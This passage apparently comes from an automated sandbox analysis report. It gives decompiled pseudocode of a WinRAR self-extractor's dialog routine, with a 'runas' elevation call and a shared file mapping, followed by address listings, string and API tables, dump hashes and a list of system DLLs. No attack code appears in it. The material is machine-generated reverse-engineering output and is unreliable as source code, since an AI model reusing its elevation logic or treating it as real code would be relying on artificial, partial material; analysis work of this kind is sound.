						_t286 = 0x1d9602;
						if( *0x1d9602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E001A9A32(_t308); // executed
						_push(0x1d75e4);
						_push(0x1d75e0);
						_push(0x1ece18);
						_push(_t302);
						 *0x1d75d6 = 0; // executed
						_t114 = E001A9EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x1d75d1 = _t277;
						}
						__eflags =  *0x1d75e4;
						if( *0x1d75e4 > 0) {
							_push(7);
							_push( *0x1d75e0);
							_push(_t302);
							E001AB4C7(_t299);
						}
						__eflags =  *0x1ede20;
						if( *0x1ede20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E0019DA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E0019DA42(_t286, 0xbe));
						}
						__eflags =  *0x1d75e4;
						if( *0x1d75e4 <= 0) {
							L103:
							__eflags =  *0x1d75d6;
							if( *0x1d75d6 != 0) {
								L114:
								__eflags =  *0x1d95fc - 2;
								if( *0x1d95fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0x1d85f8;
								if( *0x1d85f8 != 0) {
									E00191294(_t302, 0x67, 0);
									E00191294(_t302, 0x66, 0);
								}
								_t115 =  *0x1d95fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x1d75d7;
									if( *0x1d75d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0x1cdf38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x1d75d1;
								if( *0x1d75d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E0019DA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x1ece0c;
							if( *0x1ece0c != 0) {
								goto L114;
							}
							__eflags =  *0x1d95fc;
							if( *0x1d95fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E0019FA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E0019FA89(__eflags, _t321 - 0x9688, E0019DA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0x1ede20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x1ede20;
								if( *0x1ede20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0x1d75e8; // 0x0
							E001A8FE6(_t286, __eflags,  *0x1d0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0x1d75e0);
							_push(_t302); // executed
							E001AB4C7(_t299); // executed
							_t133 =  *0x1ece0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x1d95fc;
								if(__eflags == 0) {
									_t288 =  *0x1d75e8; // 0x0
									E001A8FE6(_t288, __eflags,  *0x1d0064,  *(_t321 + 0x14), _t133, 0, 0);
									L001B2B4E( *0x1ece0c);
									_pop(_t286);
								}
							}
							__eflags =  *0x1d95fc - _t277;
							if( *0x1d95fc == _t277) {
								L102:
								_push(_t277);
								_push( *0x1d75e0);
								_push(_t302);
								E001AB4C7(_t299);
								goto L103;
							} else {
								 *0x1cdf3c(_t302);
								__eflags =  *0x1d95fc - _t277;
								if( *0x1d95fc == _t277) {
									goto L102;
								}
								__eflags =  *0x1d9601;
								if( *0x1d9601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x1d75e0);
								_push(_t302);
								E001AB4C7(_t299);
								__eflags =  *0x1ede18;
								if( *0x1ede18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x1d0064, L"LICENSEDLG", 0, E001AA3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x1d75d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x1d75d0;
						if( *0x1d75d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0x1d75d0;
							if( *0x1d75d0 == 0) {
								__eflags =  *0x1d75d1;
								if( *0x1d75d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0x1d75cc;
									_t279 = _t152;
									if( *0x1d75cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0x1c22e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0x1d85f8;
									if( *0x1d85f8 == 0) {
										E0019FAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E001AC10F(_t285, _t321 - 0x1164, _t312);
										E00193E41(_t321 - 0x4288, 0x880, E0019DA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E0019DA42(_t285, 0xba);
									}
									E001AC190(0, _t163);
									__eflags =  *0x1d9601;
									if( *0x1d9601 == 0) {
										E001AC7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E00199D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E001A9A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0x1d9601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0x1d75dc = _t277;
													E001912B2(_t302, 0x67, 0);
													E001912B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E0019DA42(_t285, 0xe6)); // executed
													E001912B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0x1c22e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x1d75e0);
													_push(_t302);
													E001AB4C7(_t300);
													_push(2);
													_push( *0x1d75e0);
													_push(_t302);
													E001AB4C7(_t300);
													_push(0x1ece18);
													_push(_t302);
													 *0x1efe3c = _t277; // executed
													E001AC6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0x1d75e0);
													 *0x1efe3c = 0;
													_push(_t302);
													E001AB4C7(_t300);
													__eflags =  *0x1d75d7;
													if( *0x1d75d7 == 0) {
														__eflags =  *0x1d75cc;
														if( *0x1d75cc == 0) {
															__eflags =  *0x1ede2c;
															if( *0x1ede2c == 0) {
																_push(4);
																_push( *0x1d75e0);
																_push(_t302);
																E001AB4C7(_t300);
															}
														}
													}
													E00191294(_t302, _t277, _t277);
													 *0x1d75dc =  *0x1d75dc & 0x00000000;
													__eflags =  *0x1d75dc;
													_t182 =  *0x1d75d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E0019DA42(_t285, 0x9a));
														E00193E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E00196E03(0x1d00e0, _t277);
														E001A9735(_t302, _t321 - 0x5688, E0019DA42(0x1d00e0, 0x96), 0x30);
														 *0x1d75cc =  *0x1d75cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0x1db602;
												E0019E7AA(0x1db602, _t321 - 0x164, 0x80);
												_push(0x1da602);
												E00193E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0x1d75f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0x1e5d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0019FAB1(0x1e5d0a, _t231, 0x2000);
													}
													E001AA24E(_t285, 0x1e9d0a, 7);
													E001AA24E(_t285, 0x1ead0a, 2);
													E001AA24E(_t285, 0x1ebd0a, 0x10);
													 *0x1ece0b = _t277;
													_t285 = 0x1ecd0a;
													E0019E90C(_t277, 0x1ecd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E001AEA80(_t238, 0x1e5d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E0019E957(_t321 - 0x164, 0x80);
												E0019E957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0x1cdf20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x1ede2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E00193E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E0019943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E00199528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E0019946E(_t321 - 0x3188); // executed
											_t285 =  *0x1d9601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0x1d75d7 = 1;
									L75:
									__eflags =  *0x1d75cc;
									if( *0x1d75cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x1d75d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E0019DA42(_t285, 0x90));
									_t290 =  *0x1d00e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0019DA42(_t290, 0x96);
									E001A9735(_t302, E0019DA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0x1d75d1;
							if( *0x1d75d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x1efe3c;
						if( *0x1efe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0x1efe3d;
							_t254 = _t149 & 0xffffff00 |  *0x1efe3d == 0x00000000;
							__eflags = _t254;
							 *0x1efe3d = _t254;
							_t255 = E0019DA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0x1efe3d;
								if( *0x1efe3d == 0) {
									goto L125;
								}
								__eflags =  *0x1d75d7;
								if( *0x1d75d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0x1d75dc;
						 *0x1d75d7 = 1;
						if( *0x1d75dc == 0) {
							goto L12;
						}
						__eflags =  *0x1d75cc;
						if( *0x1d75cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00191217(_t302, E0019DA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x001aa5d1
0x001aa5d1
0x001aa5d6
0x001aa5e0
0x001aa5e6
0x001aa5ea
0x001aa5ee
0x001aa607
0x001aa611
0x001aa611
0x001aa617
0x001aacb3
0x001aacb8
0x001aacbf
0x001aacc0
0x001aacc6
0x001aaccc
0x001aacce
0x001aacd8
0x001aacd8
0x001aacde
0x001aace3
0x001aace5
0x001aacf2
0x001aacf2
0x001aad01
0x001aad10
0x001aad13
0x001aad25
0x001aad2d
0x001aad2f
0x001aad37
0x001aad39
0x001aad3c
0x001aad41
0x001aad43
0x001aad43
0x001aad4b
0x001aad52
0x001aad57
0x001aad5c
0x001aad61
0x001aad66
0x001aad67
0x001aad6e
0x001aad73
0x001aad75
0x001aad77
0x001aad77
0x001aad7d
0x001aad84
0x001aad86
0x001aad88
0x001aad8e
0x001aad8f
0x001aad8f
0x001aad94
0x001aad9b
0x001aadab
0x001aadbe
0x001aadbe
0x001aadc4
0x001aadcb
0x001aae7c
0x001aae7c
0x001aae83
0x001aaf2c
0x001aaf2c
0x001aaf33
0x001aaf38
0x001aaf38
0x001aaf3e
0x001aaf45
0x001aaf4c
0x001aaf56
0x001aaf56
0x001aaf5b
0x001aaf60
0x001aaf62
0x001aaf64
0x001aaf6b
0x001aaf6d
0x001aaf6f
0x001aaf70
0x001aaf75
0x001aaf76
0x001aaf78
0x001aaf82
0x001aaf7a
0x001aaf7a
0x001aaf7a
0x001aaf78
0x001aaf6b
0x001aaf88
0x001aaf8f
0x001aaf9e
0x001aaf9e
0x00000000
0x001aaf8f
0x001aae89
0x001aae90
0x00000000
0x00000000
0x001aae96
0x001aae9d
0x00000000
0x00000000
0x001aaea3
0x001aaea5
0x001aaeaa
0x001aaeb1
0x001aaeb1
0x001aaeb7
0x001aaec2
0x001aaec2
0x001aaec8
0x001aaed3
0x001aaee4
0x001aaefc
0x00000000
0x001aaefc
0x001aaeca
0x001aaed1
0x00000000
0x00000000
0x00000000
0x001aaed1
0x001aaeb9
0x001aaec0
0x00000000
0x00000000
0x00000000
0x001aaf01
0x001aaf01
0x001aaf02
0x001aaf02
0x001aaf0a
0x001aaf24
0x001aaf29
0x00000000
0x001aadd1
0x001aadd1
0x001aadd3
0x001aadd9
0x001aadda
0x001aaddf
0x001aade4
0x001aade6
0x001aade8
0x001aadef
0x001aadf1
0x001aae05
0x001aae10
0x001aae15
0x001aae15
0x001aadef
0x001aae16
0x001aae1c
0x001aae6f
0x001aae6f
0x001aae70
0x001aae76
0x001aae77
0x00000000
0x001aae1e
0x001aae1f
0x001aae25
0x001aae2b
0x00000000
0x00000000
0x001aae2d
0x001aae34
0x00000000
0x00000000
0x001aae36
0x001aae38
0x001aae3e
0x001aae3f
0x001aae44
0x001aae4b
0x00000000
0x00000000
0x001aae61
0x001aae67
0x001aae69
0x001aa75d
0x001aa75d
0x001aa763
0x001aa763
0x001aa687
0x001aa688
0x001aafa4
0x001aafa4
0x001aafa6
0x001aafac
0x001aafb6
0x001aafb6
0x00000000
0x001aae69
0x001aae1c
0x001aadcb
0x001aa61d
0x001aa620
0x001aa634
0x001aa634
0x00000000
0x001aa634
0x001aa625
0x001aa625
0x001aa628
0x001aa693
0x001aa69a
0x001aa732
0x001aa732
0x001aa742
0x001aa748
0x001aa74f
0x001aa769
0x001aa770
0x001aa784
0x001aa78a
0x001aa791
0x001aa793
0x001aa7a5
0x001aa7b4
0x001aa7b6
0x001aa7b6
0x001aa7bc
0x001aa7c2
0x001aa7c9
0x001aa7e6
0x001aa7f3
0x001aa816
0x001aa81b
0x001aa81e
0x001aa7cb
0x001aa7d0
0x001aa7d0
0x001aa827
0x001aa82c
0x001aa833
0x001aa83c
0x001aa83c
0x001aa841
0x001aa84b
0x001aa84c
0x001aa84f
0x001aa85c
0x001aa85d
0x001aa85f
0x001aa872
0x001aa87e
0x001aa880
0x001aa883
0x001aa885
0x001aa898
0x001aa898
0x001aa89b
0x001aa89b
0x001aa8a1
0x001aa8a3
0x001aa912
0x001aa912
0x001aa916
0x001aab5a
0x001aab60
0x001aab6a
0x001aab82
0x001aab88
0x001aab95
0x001aaba0
0x001aaba2
0x001aaba4
0x001aabaf
0x001aabaf
0x001aabb8
0x001aabb8
0x001aabbe
0x001aabc0
0x001aabc6
0x001aabc7
0x001aabcc
0x001aabce
0x001aabd4
0x001aabd5
0x001aabda
0x001aabdf
0x001aabe0
0x001aabe6
0x001aabeb
0x001aabed
0x001aabf3
0x001aabfa
0x001aabfb
0x001aac00
0x001aac07
0x001aac09
0x001aac10
0x001aac12
0x001aac19
0x001aac1b
0x001aac1d
0x001aac23
0x001aac24
0x001aac24
0x001aac19
0x001aac10
0x001aac2c
0x001aac31
0x001aac31
0x001aac38
0x00000000
0x001aac38
0x001aa91c
0x001aa923
0x001aa923
0x001aa926
0x001aa926
0x001aa928
0x001aa92c
0x001aa92e
0x001aaaf0
0x001aaaf0
0x001aaaf4
0x001aab04
0x001aab1d
0x001aab2b
0x001aab45
0x001aab4a
0x001aab4a
0x001aa685
0x001aa685
0x00000000
0x001aa685
0x001aa942
0x001aa953
0x001aa959
0x001aa95e
0x001aa97b
0x001aa980
0x001aa983
0x001aa990
0x001aa997
0x001aa9a0
0x001aa9b8
0x001aa9bb
0x001aa9c2
0x001aa9c5
0x001aa9c8
0x001aa9d5
0x001aa9d7
0x001aa9da
0x001aa9dc
0x001aaa67
0x001aa9e2
0x001aa9e2
0x001aa9e9
0x001aa9ef
0x001aa9f1
0x001aa9fe
0x001aa9fe
0x001aaa0a
0x001aaa16
0x001aaa22
0x001aaa2d
0x001aaa34
0x001aaa39
0x001aaa57
0x001aaa5a
0x001aaa5f
0x001aaa5f
0x001aaa6e
0x001aaa82
0x001aaa93
0x001aaa98
0x001aaa9a
0x001aaad4
0x001aaad7
0x00000000
0x001aaa9c
0x001aaaa4
0x001aaaaa
0x001aaaaa
0x001aaaaa
0x001aaaae
0x001aaab1
0x001aaab1
0x001aaab4
0x00000000
0x00000000
0x001aaab8
0x001aaac1
0x001aaac2
0x001aaac5
0x001aaac8
0x00000000
0x00000000
0x00000000
0x001aaac8
0x001aaacd
0x001aaada
0x001aaada
0x001aaade
0x001aaae1
0x001aaaea
0x001aaaea
0x00000000
0x001aaade
0x001aaa9a
0x001aa8a5
0x001aa8a7
0x00000000
0x00000000
0x001aa8c1
0x001aa8c6
0x001aa8cf
0x001aa8d4
0x001aa8de
0x001aa8e0
0x001aa8e7
0x001aa8ec
0x001aa8ef
0x001aa8f1
0x001aa8f3
0x001aa8f5
0x001aa8f8
0x001aa8fa
0x001aa8fa
0x001aa8f8
0x001aa8fd
0x001aa8fd
0x001aa8fd
0x001aa907
0x001aa90c
0x00000000
0x001aa90c
0x001aa887
0x001aa889
0x001aa88c
0x001aa88f
0x00000000
0x00000000
0x001aa891
0x001aa893
0x00000000
0x001aa861
0x001aa861
0x001aa863
0x001aa866
0x001aa86d
0x001aa86f
0x00000000
0x001aa86f
0x001aa868
0x001aa86b
0x00000000
0x00000000
0x00000000
0x001aa86b
0x001aa772
0x001aa774
0x001aa775
0x001aa777
0x001aac3d
0x001aac3d
0x001aac44
0x00000000
0x00000000
0x001aac4a
0x001aac4c
0x00000000
0x00000000
0x001aac57
0x001aac65
0x001aac6b
0x001aac71
0x001aac74
0x001aac7f
0x001aac89
0x001aac89
0x001aac8e
0x001aac91
0x001aac76
0x001aac76
0x001aac76
0x001aac9a
0x001aaca8
0x00000000
0x001aaca8
0x001aa770
0x001aa753
0x001aa754
0x001aa75b
0x00000000
0x00000000
0x00000000
0x001aa75b
0x001aa6a0
0x001aa6a7
0x00000000
0x001aa6ad
0x001aa6ad
0x001aa6b4
0x001aa6b9
0x001aa6bb
0x001aa6ca
0x001aa6d2
0x001aa6d5
0x001aa724
0x001aa724
0x001aa72b
0x001aa72d
0x001aa72d
0x001aa6dd
0x001aa6e4
0x00000000
0x00000000
0x001aa6f3
0x001aa6f9
0x001aa6fb
0x00000000
0x001aa701
0x001aa706
0x001aa70c
0x001aa70e
0x001aa714
0x001aa71e
0x001aa71e
0x00000000
0x001aa70e
0x001aa6fb
0x00000000
0x001aa724
0x001aa6a7
0x001aa62a
0x001aa62a
0x001aa62d
0x001aa668
0x001aa669
0x001aa670
0x001aa676
0x00000000
0x00000000
0x001aa678
0x001aa67f
0x00000000
0x00000000
0x00000000
0x001aa67f
0x001aa62f
0x001aa632
0x001aa64b
0x001aa650
0x001aa652
0x001aa65e
0x001aa65e
0x00000000
0x001aa652
0x00000000
0x001aa632
0x001aa609
0x001aa60b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 001AA5D6

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 001AA96A
C:\Users\user\Desktop, xrefs: 001AA9C8
winrarsfxmappingfile.tmp, xrefs: 001AA9A5
LICENSEDLG, xrefs: 001AAE56
@, xrefs: 001AA990
"%s"%s, xrefs: 001AAB0C
STARTDLG, xrefs: 001AA5F5
__tmp_rar_sfx_access_check_%u, xrefs: 001AA8B0
<, xrefs: 001AA983

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3617005944
Opcode ID: 24b5e2e83852b2770cfed6019540b2d08c04d2a16837e4f329c6a84c04c97ee1
Instruction ID: 5f4d6d7be0e8ac3f8e158d9be2c4bf9d7f0d1bf0590c2b2fe29496cc4c6dc048
Opcode Fuzzy Hash: 24b5e2e83852b2770cfed6019540b2d08c04d2a16837e4f329c6a84c04c97ee1
Instruction Fuzzy Hash: BB421875945344BFEB21AF60EC8AFFE3B68AF16700F80406AF605A64D1D7748D85CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019FD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0019FD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E001AD940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0x1cd080; // 0x1c2884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
